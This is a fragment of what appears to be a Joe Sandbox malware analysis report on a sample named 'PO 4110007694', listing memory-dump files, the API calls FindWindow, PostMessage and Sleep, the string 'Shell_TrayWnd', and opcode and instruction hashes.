                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: 162e213cb0cb084e539feab8cf79eecf43b7d08987e5c8ee55115e5ad8a2601e
                                                                    • Instruction ID: e8a5461aeff9dff259e766cf6a35c8adc37d9ffea9df459187bd9fbaf40035f6
                                                                    • Opcode Fuzzy Hash: 162e213cb0cb084e539feab8cf79eecf43b7d08987e5c8ee55115e5ad8a2601e
                                                                    • Instruction Fuzzy Hash: C1D01231784311B7E664BB70DC0FFDB6A14BF00B50F01083EB35AEA1D1C9E09801C654